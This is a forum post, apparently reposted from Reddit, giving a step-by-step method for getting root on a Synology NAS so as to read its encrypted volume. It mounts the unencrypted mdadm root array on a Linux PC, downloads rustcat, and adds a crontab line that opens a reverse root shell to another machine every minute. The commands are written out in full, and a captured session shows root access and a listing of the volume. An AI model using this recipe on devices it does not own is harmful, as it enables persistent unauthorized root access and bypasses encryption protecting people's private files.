Hi,
since I did not have an account here I first posted it on Reddit: Reddit - Dive into anything
Just in case, here is the same post below:
Hi, the following should work, although I did not verify one step since I don’t have access to a Linux desktop machine at the moment. I have marked this part as untested below. Also I tested on a DS918+ (but with encrypted volumes enabled through a config file), but I don’t see why it wouldn’t work on newer models. Not the most elegant method… but it gets the job done.
Please let me know in case any step does not work, as I do not have the hardware to test the exact setup.
Requirements
You need: A Linux PC with 4 SATA slots, and some (limited) command line knowledge.
The Plan
The root volume is not encrypted, it is a simple mdadm array:
quexten@valhalla:~$ sudo mdadm --detail /dev/md0
/dev/md0:
Version : 0.90
Creation Time : Thu May 11 02:47:42 2023
Raid Level : raid1
Array Size : 2490176 (2.37 GiB 2.55 GB)
Used Dev Size : 2490176 (2.37 GiB 2.55 GB)
Raid Devices : 4
Total Devices : 4
Preferred Minor : 0
Persistence : Superblock is persistent
Update Time : Wed May 24 02:51:06 2023
State : active
Active Devices : 4
Working Devices : 4
Failed Devices : 0
Spare Devices : 0
UUID : 85419165:167a5767:3017a5a8:c86610be
Events : 0.248
Number Major Minor RaidDevice State
0 8 1 0 active sync /dev/sda1
1 8 33 1 active sync /dev/sdc1
2 8 17 2 active sync /dev/sdb1
3 8 49 3 active sync /dev/sdd1
Since this contains the underlying Linux system’s binaries and configs, and it is not encrypted or signed and protected by a TPM, we can modify this to gain a root shell. Since the encrypted volume is auto mounted, we can then access the encrypted files.
The plan is to create a cron job that creates a reverse root shell on boot. We will then use the root shells to access the files. We will do this by mounting the mdadm array on an external Linux desktop, and modifying the crontab file.
(Untested) Mounting the mdadm array
(I did not test this step as I don’t have access to a desktop Linux system at the moment, but Synology recommends this as an official data recovery method, so it should work)
The first step is to power off the NAS and connect the drives to the Linux desktop. Basically, look at how to do this for your system. The mdadm array should just show up as a device, and you can mount it with f.e:
sudo mount /dev/md0 /mnt/
The Synology data recovery guide might also help:
But beware that you have to mount as read-write.
(Tested and working) Installing rustcat and adding the reverse shell cronjob
(All below is Tested to work on a DS918+)
Now that we have mounted the drives, we want to gain a persistent root shell. One way to do this is to simply create a cron job that launches a reverse shell when the NAS starts. Since netcat is not present on the NAS we will first download netcat (or in my case rustcat):
(Assumes you running as the root user)
cd /mnt/opt/
wget https://github.com/robiot/rustcat/releases/download/v3.0.0/rcat-v3.0.0-linux-x86_64 -O rcat
chmod +x rcat
vi
nano /mnt/etc/crontab
Enter the line:
* * * * * root /opt/rcat connect -s bash YOUR_LINUX_DESKTOPS_IP 55600
and replace the YOUR_LINUX_DESKTOPS_IP with your Linux desktop’s IP.
Next, start a second terminal on your desktop, download rustcat
wget https://github.com/robiot/rustcat/releases/download/v3.0.0/rcat-v3.0.0-linux-x86_64 -O rcat
chmod +x rcat
and start listening for shells:
./rcat listen -ib 55600
Now unmount the array and plug the drives back into the Synology NAS. Next start the NAS. After starting up, your second terminal should show that a shell session has connected. The shell is a root shell, and the volume is mounted, so for example:
ls /volume1
will show you the files of the encrypted volume.
./rcat-v3.0.0-linux-x86_64 listen -ib 55600
info: Listening on 0.0.0.0:55600
info: Connection Recived
bash: cannot set terminal process group (16153): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4# id
uid=0(root) gid=0(root) groups=0(root)
bash-4.4# ls /volume1/
@S2S
@SynoFinder-etc-volume
@SynoFinder-log
@database
@eaDir
@synoconfd
@tmp
@userpreference
NetBackup
backups
media
If you test this on a real system, obviously remove the cron job afterwards as it will happily connect to anyone on your network with that IP.